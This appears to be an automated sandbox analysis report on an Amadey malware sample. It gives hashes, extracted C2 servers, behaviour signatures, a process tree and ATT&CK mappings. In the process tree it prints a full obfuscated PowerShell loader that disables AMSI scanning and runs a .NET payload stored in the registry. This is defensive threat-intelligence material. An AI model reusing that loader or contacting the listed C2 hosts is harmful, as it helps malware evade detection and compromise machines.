Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-05-2024 12:58

General

  • Target

    a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe

  • Size

    1.5MB

  • MD5

    32187c18a470b54095365f8db359a671

  • SHA1

    3ce7f687006e176a5b1554e30decdfed60e35aae

  • SHA256

    a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948

  • SHA512

    a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a

  • SSDEEP

    24576:92vbP2LX8eT+onZIeV1B/0ZGP5Ulz9xw0i0sx9rNqdy5/rwjXUx68BFrgPUv:9kyweTrZIQ8o2z9ST089BqurwLI7vMcv

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 20 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Themida packer 38 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 55 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:560
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b8377828-929b-43ee-9f69-7bf2a579ed36}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2252
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:992
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:436
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:756
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1072
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1080
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1200
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1220
                        • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                          C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4304
                        • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                          C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          PID:1044
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AQEQSsXneEVd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zqPrIoOTgjIPwx,[Parameter(Position=1)][Type]$pcFHOpjewr)$umAguEtgBgl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+'l'+[Char](101)+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+'ry'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+'te'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+'s'+''+'i'+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$umAguEtgBgl.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+'l'+'N'+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+''+'d'+'');$umAguEtgBgl.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+'S'+'ig'+','+'N'+[Char](101)+'wSl'+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$pcFHOpjewr,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+'Man'+'a'+'ged');Write-Output $umAguEtgBgl.CreateType();}$uhJvvrezRzuZQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+'t.'+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+'M'+'eth'+'o'+'ds');$fuacyMnXZyCvLd=$uhJvvrezRzuZQ.GetMethod(''+[Char](71)+'e'+[Char](116)+'Pr'+[Char](111)+'cA'+'d'+'d'+'r'+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jGSjWxrSbdJNDWHInaa=AQEQSsXneEVd @([String])([IntPtr]);$sUfVPzqStEVQDePjsPTKzV=AQEQSsXneEVd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gjGdSBXvWOQ=$uhJvvrezRzuZQ.GetMethod('G'+'e'+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'nel'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$FiDHRsfwfuHrfE=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$MHGVGDORDxlWFsHcz=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+'t'+''+[Char](101)+'c'+'t'+'')));$fYfmJEK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FiDHRsfwfuHrfE,$jGSjWxrSbdJNDWHInaa).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+[Char](100)+''+'l'+''+[Char](108)+'');$EHhzRrJOiEyzmxvjT=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$fYfmJEK,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ttmblTvobe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,4,[ref]$ttmblTvobe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EHhzRrJOiEyzmxvjT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,0x20,[ref]$ttmblTvobe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3364
                        • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                          C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:484
                        • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                          C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          PID:1288
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                        1⤵
                          PID:1272
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1320
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1448
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                              • Drops file in System32 directory
                              PID:1456
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1516
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2996
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1572
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1592
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1716
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1732
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1776
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1828
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1892
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1528
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1676
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1984
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2072
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2140
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2244
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2352
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2492
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2500
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                    PID:2532
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2616
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2636
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2660
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2708
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2716
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:3044
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3196
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                    PID:3380
                                                                                    • C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe"
                                                                                      2⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Drops file in Windows directory
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4972
                                                                                      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
                                                                                        3⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2272
                                                                                        • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1968
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
                                                                                          4⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • Drops file in Windows directory
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4436
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
                                                                                            5⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1936
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe"
                                                                                              6⤵
                                                                                              • Drops startup file
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2820
                                                                                              • C:\Users\Admin\AppData\Local\Temp\$7760c8f0
                                                                                                "C:\Users\Admin\AppData\Local\Temp\$7760c8f0"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3368
                                                                                              • C:\Users\Admin\AppData\Local\Temp\$772f9fd5
                                                                                                "C:\Users\Admin\AppData\Local\Temp\$772f9fd5"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4412
                                                                                        • C:\Users\Admin\1000006002\18571080f2.exe
                                                                                          "C:\Users\Admin\1000006002\18571080f2.exe"
                                                                                          4⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          PID:2824
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3544
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                      1⤵
                                                                                        PID:3600
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3928
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                          • Suspicious use of UnmapMainImage
                                                                                          PID:4000
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:4020
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                            1⤵
                                                                                              PID:4072
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                              1⤵
                                                                                                PID:4204
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                1⤵
                                                                                                  PID:4440
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:3784
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                    1⤵
                                                                                                      PID:1108
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      1⤵
                                                                                                        PID:2528
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3444
                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3024
                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2196
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                          1⤵
                                                                                                            PID:2964
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:4100

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                            Persistence

                                                                                                            Boot or Logon Autostart Execution

                                                                                                            1
                                                                                                            T1547

                                                                                                            Registry Run Keys / Startup Folder

                                                                                                            1
                                                                                                            T1547.001

                                                                                                            Privilege Escalation

                                                                                                            Boot or Logon Autostart Execution

                                                                                                            1
                                                                                                            T1547

                                                                                                            Registry Run Keys / Startup Folder

                                                                                                            1
                                                                                                            T1547.001

                                                                                                            Defense Evasion

                                                                                                            Virtualization/Sandbox Evasion

                                                                                                            2
                                                                                                            T1497

                                                                                                            Modify Registry

                                                                                                            1
                                                                                                            T1112

                                                                                                            Discovery

                                                                                                            Query Registry

                                                                                                            3
                                                                                                            T1012

                                                                                                            Virtualization/Sandbox Evasion

                                                                                                            2
                                                                                                            T1497

                                                                                                            System Information Discovery

                                                                                                            3
                                                                                                            T1082

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\1000006002\18571080f2.exe
                                                                                                              Filesize

                                                                                                              2.1MB

                                                                                                              MD5

                                                                                                              1c7a02bb53ab156eb200122c93dde12f

                                                                                                              SHA1

                                                                                                              4b52e8d87ce511b05aa619a782e14f7e6625f37c

                                                                                                              SHA256

                                                                                                              c9b4047be7c4b7190533db32c67b85fe51c1692cca1d36944ad2f4d554b9320a

                                                                                                              SHA512

                                                                                                              72a7d5002a6972b3a7a5230cf68a54760ab282e43838cc27053dbf39eaf1bbfb370c83080a68544ae523ddeefa3e1a53fd46b9ac8715b1b74747933060061b8f

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                              MD5

                                                                                                              6e14c3b7c3374ca36a6a193eecbe6ff3

                                                                                                              SHA1

                                                                                                              481b77201a9abe4ee619642aa34048b813d940eb

                                                                                                              SHA256

                                                                                                              433c09a91cf3b14922f0f1f7833cfc172c3752c38a9fee67a42dd8b4f3dc1a51

                                                                                                              SHA512

                                                                                                              f3cdaaad74f2e855e0144a93eb0751c54dd7d2fc615f08f9c52c6b11f3fcb01bccee283eec92ac2776aba5793b8290fa94842e7480713985aad355ee29a44a99

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe
                                                                                                              Filesize

                                                                                                              4.5MB

                                                                                                              MD5

                                                                                                              133fda00a490e613f3a6c511c1c660eb

                                                                                                              SHA1

                                                                                                              e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

                                                                                                              SHA256

                                                                                                              cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

                                                                                                              SHA512

                                                                                                              f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                              Filesize

                                                                                                              1.5MB

                                                                                                              MD5

                                                                                                              32187c18a470b54095365f8db359a671

                                                                                                              SHA1

                                                                                                              3ce7f687006e176a5b1554e30decdfed60e35aae

                                                                                                              SHA256

                                                                                                              a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948

                                                                                                              SHA512

                                                                                                              a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a

                                                                                                            • C:\Windows\Temp\__PSScriptPolicyTest_sjwpayc3.ltp.ps1
                                                                                                              Filesize

                                                                                                              60B

                                                                                                              MD5

                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                              SHA1

                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                              SHA256

                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                              SHA512

                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                            • memory/484-5754-0x0000000000C30000-0x0000000001107000-memory.dmp
                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/484-5791-0x0000000000C30000-0x0000000001107000-memory.dmp
                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/1044-5019-0x0000000000810000-0x0000000000CFC000-memory.dmp
                                                                                                              Filesize

                                                                                                              4.9MB

                                                                                                            • memory/1044-5011-0x0000000000810000-0x0000000000CFC000-memory.dmp
                                                                                                              Filesize

                                                                                                              4.9MB

                                                                                                            • memory/1288-5788-0x0000000000810000-0x0000000000CFC000-memory.dmp
                                                                                                              Filesize

                                                                                                              4.9MB

